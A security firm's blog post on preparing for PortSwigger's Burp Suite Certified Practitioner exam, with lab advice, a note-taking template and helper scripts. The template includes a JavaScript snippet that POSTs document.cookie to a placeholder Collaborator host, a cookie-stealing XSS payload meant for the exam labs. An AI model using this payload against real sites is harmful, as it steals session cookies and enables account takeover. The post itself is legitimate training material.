Y-Security recently took the challenge of mastering the Burp Suite Certification offered by the creators of the No. 1 Web Application Pentesting Tool Burp Suite, PortSwigger.
Sven Schlüter
sven@y-security.de
Y-Security GmbH
11. January 2022
By becoming a Burp Suite Certified Practitioner, you will be able to demonstrate your web security testing knowledge and Burp Suite skills to the world. This certification will prove to peers, colleagues, and employers, that you have the ability to: Detect and prove the full business impact of a wide range of common web vulnerabilities – such as XSS, SQLi, OWASP Top 10 and HTTP Request Smuggling. Adapt your attack methods to bypass broken defenses, using your knowledge of fundamental web technologies like HTTP, HTML, and encodings. Quickly identify weak points within an attack surface, and perform out-of-band attacks to attack them, using manual tools to aid exploitation.
Portswigger
Preparation
PortSwigger offers Lab Access (for free) to 211 challenges at the time of writing this post. Those challenges are divided into Apprentice, Practitioner and Expert – showing the difficulty level of each challenge.
Some excessive learning material is provided (again, for free) to support solving those challenges. The material is coming from the creators of the decade old de facto standard web application testing handbook which indicates already a high quality level. Furthermore some very specific details for every upcoming Web security expert is provided.
The Labs
The labs all have the same setup – categorized vulnerabilities with raising difficulty levels to solve. It looks like this:
Upon choosing a Lab exercise you are shown a description of the lab, the PortSwigger solution and, if available a community solution. When accessing the exercise it might offer an “Exploit Server” which provides you with functionalities to exploit some of the vulnerabilities. For example, you might need to “deliver an exploit” to another user of the application, review requests made to your attacker server or receive emails.
The Exam
Before taking the exam … have you taken the practice exam? The exam will be similar to that, just with two applications instead of one.
I would recommend that anyone taking the exam has most of the Apprentice and Practitioner labs finished. The Expert level labs are good to know, but I didn’t need that knowledge in the exam.
Make sure to get yourself familiar with the exam getting started. Essentials are the username list, the password list and the Cross-Site Scripting Cheat Sheet.
PortSwigger explains that you will need Burp Suite Professional subscription to take the exam. To our experience, that isn’t true (Update) but then again, there isn’t anyone doing serious application testing without having a working Burp license, right? Right? … Right!
The proctoring happens after you’ve purchased the exam via the PortSwigger my-account page. The proctoring service will only bound your user account to a verified ID (from what I can tell). So, your testing won’t be proctored (see my reservation on that in my conclusion). A thing to note is that the proctoring service only works with Google Chrome on Windows and it requires you to install a Chrome Plugin. The exam itself can be taken from another system.
Tips & Hints
At Y-Security we have all passed the PortSwigger Exam already and there are a few things we would like to point out that might support when taking the exam for the first time.
Note Templating
You will receive two applications to test in the exam. The applications might look almost identically and the URL isn’t memorable either so it quickly becomes confusing when you’re testing the two applications at the same time.
I’ve used the following Markdown template for my note taking to not get the two applications confused:
# App 1
## Credentials & Data
### URL
App: https://<<INSERTTOKEN>>.web-security-academy.net/
Exploit-Server: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/
E-Mail: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/email
Access_log: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/log
### Credentials & Sessiontokens
carlos:<<insertpassword>>
<<insertuser>>:<<insertpassword>>
administrator:<<insertpassword>>
### Diffs found
* A
* B
## Attack Paths
### Attack guest to user
* A
* B
```JavaScript
Exploitdetails
```
### Attack user to admin
* A
* B
```JavaScript
Exploitdetails
```
### Attack admin to local file access
* A
* B
```JavaScript
Exploitdetails
```
## Unsuccessful attacks
* A
* B
* C
# App 2
## Credentials & Data
### URL
App: https://<<INSERTTOKEN>>.web-security-academy.net/
Exploit-Server: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/
E-Mail: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/email
Access_log: https://exploit-<<INSERTTOKEN>>.web-security-academy.net/log
### Credentials & Sessiontokens
carlos:<<insertpassword>>
<<insertuser>>:<<insertpassword>>
administrator:<<insertpassword>>
### Diffs found
* A
* B
## Attack Paths
### Attack guest to user
* A
* B
```JavaScript
Exploitdetails
```
### Attack user to admin
* A
* B
```JavaScript
Exploitdetails
```
### Attack admin to local file access
* A
* B
```JavaScript
Exploitdetails
```
## Unsuccessful attacks
* A
* B
* C
# Scripts & Notes
## CSRF
```HTML
<script>
fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
```
## ..
It helped me a lot to write down which tests I already did on which application and which issues I already discovered (and of course, also the issues that have been tested, but haven’t been found to be present).
Have the LAB ready
Often you will recognize a potential attack pattern – so you want to check your notes, or you know the attack, but you are missing the particular script. Time is key and that’s why I’ve dumped the solutions of all Labs to my beloved Markdown before I took the exam with the following quick and dirty script:
#!/usr/bin/env python3
import sys
import requests
import bs4
import html2text
from urllib.parse import urlparse
def writemd(url):
parts = urlparse(url)
directories = parts.path.strip('/').split('/')
filename=directories[-1]
response = requests.get(url).content
soup = bs4.BeautifulSoup(response, "lxml")
div = soup.find("div", {"class": "component-solution is-expandable"})
h = html2text.HTML2Text()
md=h.handle(str(div))
f=open(filename+".md","w")
f.write(md)
f.close()
response = requests.get("https://portswigger.net/web-security/all-labs").content
soup = bs4.BeautifulSoup(response, "lxml")
divs = soup.find_all("div", {"class": "widgetcontainer-lab-link"})
for div in divs:
linker = div.find("a", href=True)
link = linker['href']
print(link)
writemd("https://portswigger.net"+link)
At the very least, have the LAB URL https://portswigger.net/web-security/all-labs available.
Find the difference
As explained above, the applications we have found (in the Lab and Exam) are almost identical all the time. Mostly you can guess in which part a vulnerability is, when you diff the applications against each other. A quick’n’dirty hack to compare two apps is the below script:
#!/bin/bash
domainONE="ABC.web-security-academy.net"
sessONE="ABC"
domainTWO="ABC.web-security-academy.net"
sessTWO="ABC"
wget --no-cookies --header "Cookie: session=$sessONE" --recursive --page-requisites --adjust-extension --span-hosts --convert-links --restrict-file-names=windows --no-parent --no-check-certificate --domain "$domainONE" "https://$domainONE"
wget --no-cookies --header "Cookie: session=$sessTWO" --recursive --page-requisites --adjust-extension --span-hosts --convert-links --restrict-file-names=windows --no-parent --no-check-certificate --domain "$domainONE" "https://$domainTWO"
diff -qr "$domainONE" "$domainTWO" | sort
Obviously, you need to replace the two domain tokens and the session. I found this method mildly useful, but maybe it does help others.
Stay calm
Stay calm, hack and RTFM – you’ve got 4 hours and it might be that you’re spending 3 hours on just 20% of the issues.
When thinking about a potential attack path, remember that there will never be a path from “guest” to “admin file-read”, because the exam requires you to follow the exploitation order from guest, to user, to admin, to local-file read. An experienced penetration tester might watch out “for all” issues, but it depends on where you are in the progress to focus only on some specific vulnerabilities.
If you have followed the advice to run through the lab exercises beforehand and familiarize yourself with the exam content, it is very likely that you will pass – and if not? Repeat 🙂
Conclusion
PortSwigger created a fantastic exam with some incredible detailed and useful learning material. Overall, a good certificate to have on your list. We will incorporate parts of the labs in our necessary internal training and our general methodology for web application testing.
Only downside might could be that the exam isn’t fully proctored and with that, that the trust in the certificate might become weaker over time.
Sven Schlüter – Y-Security GmbH
The PortSwigger team provides valuable knowledge with their research, tools and Labs and it is great to see that it is shared with the public.
Taking the exam has been fun as the challenges itself were absolutely fair and no guessing was needed. The only downside I expected during the exam was that the servers couldn’t be restarted. Hosting a file at “/” on your exploit server might break the whole exam :).
Christian Becker – Y-Security GmbH
Update 14. January 2022
We have received feedback to our Portswigger Burp Suite Certification post. In particular, we have received feedback about our statement that Burp Suite Professional isn’t required for the exam. We’ve been made aware that external communication is prohibited and only PortSwigger owned networks and systems are trusted.